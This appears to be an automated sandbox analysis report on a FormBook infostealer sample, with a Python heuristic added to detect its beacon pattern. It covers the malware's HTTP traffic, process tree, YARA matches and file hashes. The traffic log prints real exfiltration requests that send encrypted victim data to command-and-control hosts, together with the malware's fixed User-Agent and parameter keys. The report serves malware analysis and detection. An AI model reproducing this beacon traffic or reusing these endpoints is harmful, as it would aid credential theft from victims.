                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                          Dec 5, 2024 18:23:02.598225117 CET  203  IN  Data Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                          Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          9           192.168.2.8  49821        54.67.87.110    80                3164  C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe

                                          Timestamp                           Bytes transferred  Direction  Data
                                          Dec 5, 2024 18:23:08.634721994 CET  766                OUT        POST /qj8y/ HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ngmr.xyz
                                          Connection: close
                                          Content-Length: 208
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ngmr.xyz/qj8y/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 59 4a 45 52 33 58 44 44 64 71 51 35 43 51 2b 2b 68 4b 41 32 6b 6a 58 68 51 61 76 64 6a 49 6d 50 53 4f 2f 32 6f 4e 58 33 42 42 53 4b 77 74 72 6e 75 78 76 44 51 78 2b 37 4c 57 4a 6d 42 7a 34 30 57 2b 7a 6a 42 58 65 58 37 2b 37 61 31 76 64 52 6b 57 68 45 67 56 31 67 39 56 31 6c 4f 59 55 34 31 4c 34 6b 58 33 69 72 65 73 6e 73 2f 34 61 39 37 6a 42 5a 34 58 6e 4d 50 7a 65 70 79 70 6c 79 36 71 34 4f 33 43 6d 41 64 37 50 4e 6f 75 4b 45 46 4a 43 61 30 67 63 6a 65 32 56 4f 4f 61 69 56 6b 57 48 6e 33 4f 2f 38 72 52 62 57 54 47 63 2f 52 66 51 76 2f 5a 78 37 5a 71 79 47 47 50 58 74 32 55 6e 75 52 59 51 3d
                                          Data Ascii: DTs4CD4=YJER3XDDdqQ5CQ++hKA2kjXhQavdjImPSO/2oNX3BBSKwtrnuxvDQx+7LWJmBz40W+zjBXeX7+7a1vdRkWhEgV1g9V1lOYU41L4kX3iresns/4a97jBZ4XnMPzepyply6q4O3CmAd7PNouKEFJCa0gcje2VOOaiVkWHn3O/8rRbWTGc/RfQv/Zx7ZqyGGPXt2UnuRYQ=
                                          Dec 5, 2024 18:23:09.855412006 CET  550  IN  HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:31 GMT
                                          X-Varnish: 1252442322
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          10          192.168.2.8  49827        54.67.87.110    80                3164  C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe

                                          Timestamp                           Bytes transferred  Direction  Data
                                          Dec 5, 2024 18:23:11.304506063 CET  786                OUT        POST /qj8y/ HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ngmr.xyz
                                          Connection: close
                                          Content-Length: 228
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ngmr.xyz/qj8y/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 32 4b 78 4a 6a 6e 76 31 37 44 64 52 2b 37 41 32 4a 6a 63 44 34 2f 57 2b 32 57 42 53 2b 58 37 2b 48 61 31 74 56 52 6e 6c 35 4c 67 46 31 75 78 31 31 6e 54 6f 55 34 31 4c 34 6b 58 7a 4f 52 65 6f 7a 73 2f 4c 53 39 37 43 42 65 77 33 6e 4e 49 7a 65 70 32 70 6c 2b 36 71 34 38 33 47 47 6d 64 35 33 4e 6f 75 61 45 4c 36 61 5a 36 67 63 6c 44 6d 56 52 4a 37 62 4e 74 6e 53 43 70 39 6d 5a 6d 52 54 7a 53 77 78 56 4c 39 59 70 38 5a 5a 51 5a 70 61 77 44 34 4b 46 73 33 33 65 50 50 45 7a 7a 6b 78 31 57 67 42 5a 75 43 66 70 64 6d 76 57 53 33 53 4c
                                          Data Ascii: DTs4CD4=YJER3XDDdqQ5AwO+uNc2oTXmJqvdxImLSOz2oP7BBy2KxJjnv17DdR+7A2JjcD4/W+2WBS+X7+Ha1tVRnl5LgF1ux11nToU41L4kXzOReozs/LS97CBew3nNIzep2pl+6q483GGmd53NouaEL6aZ6gclDmVRJ7bNtnSCp9mZmRTzSwxVL9Yp8ZZQZpawD4KFs33ePPEzzkx1WgBZuCfpdmvWS3SL
                                          Dec 5, 2024 18:23:12.522968054 CET  550  IN  HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:34 GMT
                                          X-Varnish: 1252442352
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          11          192.168.2.8  49833        54.67.87.110    80                3164  C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe

                                          Timestamp                           Bytes transferred  Direction  Data
                                          Dec 5, 2024 18:23:13.980938911 CET  1803               OUT        POST /qj8y/ HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Accept-Encoding: gzip, deflate, br
                                          Origin: http://www.ngmr.xyz
                                          Connection: close
                                          Content-Length: 1244
                                          Cache-Control: max-age=0
                                          Content-Type: application/x-www-form-urlencoded
                                          Referer: http://www.ngmr.xyz/qj8y/
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Data Raw: 44 54 73 34 43 44 34 3d 59 4a 45 52 33 58 44 44 64 71 51 35 41 77 4f 2b 75 4e 63 32 6f 54 58 6d 4a 71 76 64 78 49 6d 4c 53 4f 7a 32 6f 50 37 42 42 79 2b 4b 77 37 37 6e 74 55 37 44 63 52 2b 37 4a 57 4a 69 63 44 34 2b 57 34 66 65 42 53 36 74 37 37 4c 61 30 4f 4e 52 69 55 35 4c 76 46 31 75 75 46 31 6d 4f 59 55 74 31 4c 49 6f 58 7a 2b 52 65 6f 7a 73 2f 4b 43 39 35 54 42 65 32 33 6e 4d 50 7a 65 74 79 70 6c 53 36 71 67 57 33 47 43 70 64 4e 44 4e 6f 50 71 45 47 6f 43 5a 79 67 63 6e 41 6d 55 45 4a 36 6e 73 74 6e 2f 39 70 2b 37 79 6d 53 7a 7a 65 57 77 4b 5a 39 59 6a 2b 62 64 2f 57 75 65 6c 64 4a 2f 70 68 57 4b 72 46 39 73 37 78 42 35 43 63 53 4a 34 76 7a 57 6b 4c 52 6e 6b 57 43 62 4c 67 48 34 38 59 68 6f 46 2b 53 41 38 37 79 30 31 35 50 31 56 56 50 4c 4f 61 71 73 48 51 73 47 53 6d 46 32 31 52 37 6e 74 67 46 41 79 65 46 6f 4c 49 73 70 4a 30 57 39 57 49 59 6f 70 47 4c 4c 69 55 61 71 73 31 38 6f 4b 34 66 42 52 74 78 57 4b 52 45 6a 42 39 35 48 50 72 53 38 54 55 67 48 68 51 54 44 41 76 52 59 53 37 6b 68 30 6b 31 [TRUNCATED]
                                          Data Ascii: DTs4CD4=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 [TRUNCATED]
                                          Dec 5, 2024 18:23:15.254499912 CET  550  IN  HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:36 GMT
                                          X-Varnish: 1252442382
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port
                                          12          192.168.2.8  49842        54.67.87.110    80

                                          Timestamp                           Bytes transferred  Direction  Data
                                          Dec 5, 2024 18:23:17.453905106 CET  509                OUT        GET /qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Dec 5, 2024 18:23:18.683528900 CET  550  IN  HTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:40 GMT
                                          X-Varnish: 1252442421
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
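
                                          Sessions 7 to 12 above show one beacon shape repeated against two unrelated hosts: the same fixed Internet Explorer 7 User-Agent on every request, the same form/query key DTs4CD4 on both hosts, a one-segment directory path per host (/mgg3/ on www.ophthalmo.cloud, /qj8y/ on www.ngmr.xyz), a POST to that path followed by a GET carrying the same key plus a short companion key (v4=NRh8), and a 404 from every host (www.ophthalmo.cloud is an IONOS parking page). The detector below is an added example written for this report; it is not part of the Joe Sandbox output or the sample's own code. It parses raw HTTP/1.1 requests and flags a parameter name that is reused in this way. The request list is reconstructed from the sessions above with the encrypted values shortened to a prefix, the final curl request is a constructed benign control, and the min_hosts threshold is an assumption chosen for this data.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# User-Agent sent on every request in the sessions above. It is a fixed
# string carried by the sample, not the browser installed on the victim.
FORMBOOK_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; "
               "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
               "Media Center PC 6.0; .NET4.0C; .NET4.0E)")

# Constructed sample input: request line, Host, User-Agent and form/query keys
# reproduced from sessions 7-12 above, with the encrypted values shortened.
# The last request is a constructed benign form post that must not be flagged.
SAMPLE_REQUESTS = [
    "POST /mgg3/ HTTP/1.1\r\nHost: www.ophthalmo.cloud\r\nUser-Agent: " + FORMBOOK_UA
    + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nDTs4CD4=tGqcJQu3iOnort",
    "GET /mgg3/?DTs4CD4=gEC8KgLUidSdu&v4=NRh8 HTTP/1.1\r\nHost: www.ophthalmo.cloud\r\n"
    "User-Agent: " + FORMBOOK_UA + "\r\n\r\n",
    "POST /qj8y/ HTTP/1.1\r\nHost: www.ngmr.xyz\r\nUser-Agent: " + FORMBOOK_UA
    + "\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nDTs4CD4=YJER3XDDdqQ5",
    "GET /qj8y/?DTs4CD4=VLsx0gmXQ4Y&v4=NRh8 HTTP/1.1\r\nHost: www.ngmr.xyz\r\n"
    "User-Agent: " + FORMBOOK_UA + "\r\n\r\n",
    "POST /login HTTP/1.1\r\nHost: www.example.org\r\nUser-Agent: curl/8.4.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\nuser=alice&pass=x",
]


def parse_request(raw):
    """Split one raw HTTP/1.1 request into the fields the heuristic uses.
    Parameter names come from the query string for GET and from the
    urlencoded body for POST; values are ignored because they are encrypted."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = url.query if method == "GET" else body
    names = [k for k, _ in parse_qsl(query, keep_blank_values=True)]
    return {"method": method, "host": headers.get("host", ""),
            "path": url.path, "ua": headers.get("user-agent", ""), "params": names}


def find_beacon_keys(raw_requests, min_hosts=2):
    """Group requests by their first parameter name and return the names that
    show the beacon shape seen above: the same key reused verbatim against at
    least `min_hosts` different hosts, sent both as the POST form key and as
    the first GET query key, always to a one-segment directory path, with a
    single fixed User-Agent. Result: {key: sorted list of (host, path)}."""
    groups = defaultdict(lambda: {"targets": set(), "methods": set(),
                                  "uas": set(), "get_tail": set()})
    for raw in raw_requests:
        req = parse_request(raw)
        if not req["params"]:
            continue
        g = groups[req["params"][0]]
        g["targets"].add((req["host"], req["path"]))
        g["methods"].add(req["method"])
        g["uas"].add(req["ua"])
        if req["method"] == "GET" and len(req["params"]) > 1:
            g["get_tail"].add(req["params"][1])  # short companion key (v4 above)
    hits = {}
    for key, g in groups.items():
        hosts = {h for h, _ in g["targets"]}
        dir_paths = all(re.fullmatch(r"/[A-Za-z0-9]+/", p) for _, p in g["targets"])
        if (len(hosts) >= min_hosts and {"GET", "POST"} <= g["methods"]
                and dir_paths and len(g["uas"]) == 1):
            hits[key] = sorted(g["targets"])
    return hits


if __name__ == "__main__":
    for key, targets in find_beacon_keys(SAMPLE_REQUESTS).items():
        print(f"beacon key {key!r} reused against {len(targets)} hosts:")
        for host, path in targets:
            print(f"  http://{host}{path}")
```

                                          The grouping key is the first parameter name rather than the host, because the host rotates while the key stays constant. That also means the heuristic only fires once at least two hosts have been seen from the same client; on a single beacon the fixed User-Agent and the POST-then-GET pair to a bare directory path are the only signals, and neither is strong enough to alert on by itself.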


                                          Target ID:0
                                          Start time:12:21:08
                                          Start date:05/12/2024
                                          Path:C:\Users\user\Desktop\s7Okni1gfE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\s7Okni1gfE.exe"
                                          Imagebase:0x800000
                                          File size:1'226'752 bytes
                                          MD5 hash:19730719A742EE889C6BD0B9E635D234
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:12:21:09
                                          Start date:05/12/2024
                                          Path:C:\Windows\SysWOW64\svchost.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\s7Okni1gfE.exe"
                                          Imagebase:0xb10000
                                          File size:46'504 bytes
                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:12:21:51
                                          Start date:05/12/2024
                                          Path:C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe"
                                          Imagebase:0x7f0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:7
                                          Start time:12:21:52
                                          Start date:05/12/2024
                                          Path:C:\Windows\SysWOW64\clip.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\clip.exe"
                                          Imagebase:0x4d0000
                                          File size:24'576 bytes
                                          MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:8
                                          Start time:12:22:06
                                          Start date:05/12/2024
                                          Path:C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe"
                                          Imagebase:0x7f0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          Target ID:10
                                          Start time:12:22:18
                                          Start date:05/12/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6d20e0000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:3.8%
                                            Dynamic/Decrypted Code Coverage:0.9%
                                            Signature Coverage:7.2%
                                            Total number of Nodes:1992
                                            Total number of Limit Nodes:70
